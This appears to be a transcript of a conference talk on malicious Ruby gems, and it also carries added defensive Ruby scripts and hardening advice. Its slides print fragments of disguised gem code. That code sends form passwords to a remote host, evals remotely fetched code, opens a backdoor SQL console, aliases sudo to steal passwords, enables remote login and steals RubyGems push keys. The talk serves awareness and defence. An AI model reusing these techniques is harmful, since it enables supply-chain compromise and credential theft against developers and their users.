Hacking with Gems (ConFoo 2014)

Benjamin Smith

February 27, 2014

Transcript

  1. Hacking with Gems
     Benjamin Smith @benjamin_smith
     Thursday, February 27, 14

  2. How-to get rich quick and (maybe) not go to jail!

  3. Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.
  4. who i am

  5-7. (no text)

  8. what i am NOT

  9. (no text)

  10-11. please do not try this at home

  12-13. (no text)

  14-17. Lawful Evil / Lawful Good

  18. once upon a time
  19. GEM
        remote: https://rubygems.org/
        specs:
          actionmailer (4.0.3)
            actionpack (= 4.0.3)
            mail (~> 2.5.4)
          actionpack (4.0.3)
            activesupport (= 4.0.3)
            builder (~> 3.1.0)
            erubis (~> 2.7.0)
            rack (~> 1.5.2)
          ...

  20. what’s the worst that could happen?

  21. (no text)

  22. gem 'awesome_rails_flash_messages'
      github.com/benjaminleesmith/awesome-rails-flash-messages

  23. before...

  24. after!

  25. some “side effects”
        if params.to_s.match(Base64.decode64('cGF...'))

  26. ...
        File.open("#{Rails.root}/public/development.log", 'a+') do |f|
          f.write("#{params.inspect}\n")
        end

  27. ?!?
        Net::HTTP.post_form(
          URI.parse(Base64.decode64('aHR0cDo...')),
          { 'log' => params.merge(:url => request.url).inspect }
        )

  28. i like cGFzc3dvcmQ=\n
        if params.to_s.match(Base64.decode64('cGF...'))

  29. i like password
        if params.to_s.match("password")

  30. “development.log”
        ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ...

  31. elsewhere...

  32. profit
        • Step 1: do something
        • Step 2: do something else
        • Step 3: ????
        • Step 4: profit

  33-37. profit (built up one step per slide)
        • Step 1: write a gem that does something
        • Step 2: add code to harvest emails/pws
        • Step 3: use emails/pws on banking websites to transfer funds
        • Step 4: profit
        • Step 5: flee the country

  38. a one way ticket to

  39. that was easy. what else can I do?

  40. gem 'net_http_detector'
      github.com/benjaminleesmith/net_http_detector

  41. show me the hack
        Net::HTTP.post_form(#<URI::HTTP:0x007fc76b706950 URL:http://stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...

  42-44. how it works
        def HTTP.valid_post_form(url, params)
          ...
        def HTTP.post_form(url, params)
          self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
          Net::HTTP.valid_post_form(url, params)
        end

  45. ...and one more thing...
        eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))
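The wrapper on slides 42-44 works because Ruby lets any loaded file redefine a standard-library method, and nothing in the application notices. The check below is an added example (not code from the talk or from the net_http_detector gem): it records where each sensitive Net::HTTP method is defined, treats only Ruby's own stdlib directories as trusted, and reports methods whose definition has moved since boot. The watched-method list and the stand-in wrapper at the end are assumptions chosen for the demonstration; the wrapper only records calls and delegates, it is there so the check has something to catch.

```ruby
require 'net/http'
require 'rbconfig'

# Directories holding Ruby's own standard library. A watched method whose
# Ruby-level definition lives anywhere else (a gem directory, a vendored file,
# a one-off script) has been redefined after Ruby loaded it.
TRUSTED_ROOTS = [RbConfig::CONFIG['rubylibdir'], RbConfig::CONFIG['archdir']]
                .compact.map { |d| File.expand_path(d) + File::SEPARATOR }.freeze

# Methods a credential-harvesting wrapper would most plausibly replace
# (assumed list): [owner, method name, singleton method?]
WATCHED_METHODS = [
  [Net::HTTP, :post_form,    true],
  [Net::HTTP, :get,          true],
  [Net::HTTP, :get_response, true],
  [Net::HTTP, :request,      false],
  [Net::HTTP, :start,        false]
].freeze

# Snapshot: "Owner.method" => absolute path of its current definition.
# Methods implemented in C have no source_location and are recorded as nil.
def definition_snapshot
  WATCHED_METHODS.each_with_object({}) do |(owner, name, singleton), snap|
    meth  = singleton ? owner.method(name) : owner.instance_method(name)
    label = singleton ? "#{owner}.#{name}" : "#{owner}##{name}"
    loc   = meth.source_location
    snap[label] = loc && File.expand_path(loc.first)
  end
end

# Entries whose definition sits outside the standard library.
def foreign_definitions(snapshot)
  snapshot.reject { |_, path| path.nil? || TRUSTED_ROOTS.any? { |root| path.start_with?(root) } }
end

# Entries whose definition moved between two snapshots (boot time vs. now).
def changed_since(baseline, current)
  current.reject { |label, path| baseline[label] == path }
end

BASELINE = definition_snapshot

# Constructed stand-in for the wrapper on slides 42-44: it records the call and
# delegates, with no logging or network activity of its own. It exists only so
# the check above has a redefinition to detect.
module Net
  class HTTP
    CALL_LOG = []
    class << self
      alias_method :original_post_form, :post_form
      def post_form(url, params)
        CALL_LOG << url.to_s
        original_post_form(url, params)
      end
    end
  end
end

AFTER_PATCH = definition_snapshot

if $PROGRAM_NAME == __FILE__
  puts "foreign definitions at boot:    #{foreign_definitions(BASELINE).inspect}"
  puts "definitions changed since boot: #{changed_since(BASELINE, AFTER_PATCH).inspect}"
end
```

Taking the baseline snapshot in a known-clean process (for example in CI, before Bundler.require) and comparing against it after all gems are loaded is the practical pattern; a legitimate instrumentation gem will also show up, so the output is a review list, not a verdict.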
  46-49. database what?
        append_before_filter :net_http_detector
        ...
        if params[:db_console]
          @tables = ActiveRecord::Base.connection.tables
          if params[:query]
            @output = ActiveRecord::Base.connection.execute(params[:query])

  50. /users/sign_in

  51. /users/sign_in?db_console=t

  52. hello db access!

  53. SELECT * FROM users;

  54. UPDATE users SET admin=1 WHERE id=42;

  55. CREATE USER admin1 WITH PASSWORD 'password';

  56. careful of wolves in sheep’s clothing
  57-62. profit (built up one step per slide)
        • Step 1: write a gem that does something
        • Step 2: add code to provide DB access
        • Step 3: use personal info to apply for a boat loan (i.e. buy a pimp trimaran)
        • Step 4: profit
        • Step 5: flee the country

  63. i like the beach

  64. that was easy. what else can I do?

  65. gem 'better_date_to_s'
      github.com/benjaminleesmith/better_date_to_s

  66. what it claims to do
        Date.new(2005, 1, 1).to_s(:short)
        => "1 Jan"
        ... instead of ...
        => " 1 Jan"

  67. (no text)

  68. what it also does
        set_date_formats_for(Rails.env, Rails.root.to_s)

  69. better_date_to_s.bundle
      (raw dump of the compiled Mach-O extension; only the segment names are legible: __TEXT, __text, __stubs, __stub_helper, __cstring, __unwind_info, __eh_frame, __DATA, __nl_symbol_ptr, __got, __la_symbol_ptr, __data, __LINKEDIT)

  70. behind the curtain
        if(strcmp(rails_env, "production") == 0) {
          sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1", rails_root, rails_root);
          system(tar_command);
        }

  71. what what

  72. i can haz source

  73. truth time
        • this gem doesn't actually work
        • but it could... if I wasn't lazy
        • "fat" gems are tricky to compile

  74. so much code so little time
        • Step 1: write a gem that does something
        • Step 2: add code to expose source
        • Step 3: sell to competitors?
        • Step 4: profit?
        • Step 5: flee the country

  75. that was ~~easy~~ hard. what else can I do? (that's easier)

  76. gem install be_truthy
      github.com/benjaminleesmith/be_truthy
  77. what it does
        > true.should be_true
        > User.new.should be_true
        > User.new.should be_truthy

  78. what it ACTUALLY does

  79. (no text)

  80. file tree looks ok

  81. source code looks good
        require "be_truthy/version"
        module BeTruthy
        end

  82. but what was this?

  83. I see no C

  84. run the what file?
        Gem::Specification.new do |gem|
          ...
          gem.extensions = ["Rakefile"]
          ...
        end

  85. there is no Rakefile

  86-87. the real file tree

  88. what does the Rakefile do?

  89.   sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
        FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

  90.   File.open(profile, 'a+') do |f|
          f.write("alias sudo='ruby #{home}/.tmp'\n")
        end

  91.   FileUtils.rm(__FILE__)
  92. what does "sudo" do now?

  93-96.
        print "WARNING: Improper use of the sudo command ..."
        system "stty -echo"
        password = $stdin.gets.chomp
        system "stty echo"
        print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

  97.   echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on

  98.   /usr/bin/sudo dscl . -create /Users/#{username}
        ...
        /usr/bin/sudo dscl . -passwd /Users/#{username} password`

  99.   Net::HTTP.post_form(URI.parse('http://.../logs'), {'log' => 'ssh enabled'})

  100. ssh sysadmin@your-ip

  101. take away: don't install ben's gems

  102. (no text)

  103. how could I get you to install my gems?

  104. what gems are trustworthy?

  105. how can I add my code to already trusted gems?
  106-109. back in the be_truthy gem
        gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
        gem_list = `gem list`
        Net::HTTP.post_form(...)

  110. now I own your gems

  111.  > git clone your-gem-repo
        ...add a little code...
        > rake build
        > gem push your-gem
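Two things the be_truthy hook leaves behind on a developer machine are visible from user space: the `alias sudo=` line appended to a shell profile (slide 90) and the readable `~/.gem/credentials` file it lifts the push key from (slides 106-109). The audit below is an added example, not code from the talk or the gem, that checks a home directory for both. The list of profile files, the regex for sudo redefinitions, and the demo home directory it builds are assumptions; the constructed profile lines and the placeholder key are not real credentials.

```ruby
require 'fileutils'
require 'tmpdir'

# Shell start-up files a post-install hook could append to (assumed list).
SHELL_PROFILES = %w[.bash_profile .bashrc .profile .zshrc .zprofile].freeze

# Lines that replace sudo: an alias, a shell function, or `function sudo`.
SUDO_REDEFINITION = /\A\s*(?:alias\s+sudo=|sudo\s*\(\)|function\s+sudo\b)/

# [path, line number, line] for every sudo redefinition in the profiles under home.
def sudo_redefinitions(home)
  SHELL_PROFILES.each_with_object([]) do |name, hits|
    path = File.join(home, name)
    next unless File.file?(path)
    File.readlines(path).each_with_index do |line, idx|
      hits << [path, idx + 1, line.chomp] if SUDO_REDEFINITION.match?(line)
    end
  end
end

# ~/.gem/credentials holds the RubyGems push key. Any mode wider than 0600 lets
# other local users read it; current RubyGems versions refuse to push with such a file.
def credentials_issues(home)
  path = File.join(home, '.gem', 'credentials')
  return [] unless File.file?(path)
  mode = File.stat(path).mode & 0o777
  mode == 0o600 ? [] : [[path, format('mode %04o, expected 0600', mode)]]
end

def audit_home(home)
  { sudo: sudo_redefinitions(home), credentials: credentials_issues(home) }
end

# Constructed throw-away home directory reproducing the two symptoms from the
# slides: a sudo alias appended to a profile and a world-readable credentials file.
def build_demo_home
  home = Dir.mktmpdir('demo-home')
  File.write(File.join(home, '.bash_profile'), "export EDITOR=vim\nalias sudo='ruby ~/.tmp'\n")
  File.write(File.join(home, '.zshrc'), "sudo() { /usr/bin/sudo \"$@\"; }\n")
  FileUtils.mkdir_p(File.join(home, '.gem'))
  cred = File.join(home, '.gem', 'credentials')
  File.write(cred, "---\n:rubygems_api_key: PLACEHOLDER_NOT_A_REAL_KEY\n")
  File.chmod(0o644, cred)
  home
end

if $PROGRAM_NAME == __FILE__
  home = build_demo_home
  report = audit_home(home)
  report[:sudo].each { |path, n, line| puts "sudo redefined in #{path}:#{n}: #{line}" }
  report[:credentials].each { |path, why| puts "credentials exposed at #{path}: #{why}" }
  FileUtils.rm_rf(home)
end
```

Run `audit_home(Dir.home)` from a cron job or a login hook; any sudo redefinition is worth a look even when it turns out to be a harmless wrapper, and `type sudo` in an interactive shell gives the same answer for the current session.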
  112. do people trust your gems?

  113. do people who install your gems have trustworthy gems?

  114. (no text)

  115. there’s still one problem

  116. bootstrapping

  117. being popular sucks

  118. conferences

  119. social engineering

  120-122. (no text)

  123. so what happens now?

  124. ruby gems goes down

  125. heroku deploys go down

  126. i go to the beach

  127. ruby gems goes down

  128. heroku deploys go down

  129. recovery

  130. so what now?
  131. gem 'awesome_rails_flash_messages'
       github.com/benjaminleesmith/awesome-rails-flash-messages

  132. Little Snitch
       obdev.at/products/littlesnitch/index.html

  133. gem install be_truthy
       github.com/benjaminleesmith/be_truthy

  134. fseventer
       fernlightning.com/doku.php?id=software:fseventer:start

  135. don’t “gem install” from strangers

  136. gem fetch vs gem install
        > gem fetch be_truthy
        > gem unpack be_truthy-0.0.1.gem

  137-138. (no text)

  139. curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

  140. gem install rails -P HighSecurity

  141.  > gem install rails -P HighSecurity
        Fetching: atomic-1.1.15.gem (100%)
        ERROR:  While executing gem ... (Gem::Security::Exception)
            unsigned gems are not allowed by the High Security policy

  142. gem cert --build

  143. https://www.rubygems-openpgp-ca.org/
       https://github.com/rubygems-trust
       http://corner.squareup.com/2013/12/securing-rubygems-with-tuf-part-1.html
       http://corner.squareup.com/2013/12/securing-rubygems-with-tuf-part-2.html

  144. sandboxing

  145. github.com/rubygems/rubygems

  146. tools to detect malicious code

  147. private gem repos

  148. do not try this at home

  149. don't install gems you don't need to

  150. pay attention to what your gems do

  151. monitor your system

  152. read the source

  153. gem install coal-mine-canary
       github.com/benjaminleesmith/coal-mine-canary

  154. on install

  155. the results

  156. thank you!

  157-159. questions? ideas?
       @benjamin_smith
       https://github.com/benjaminleesmith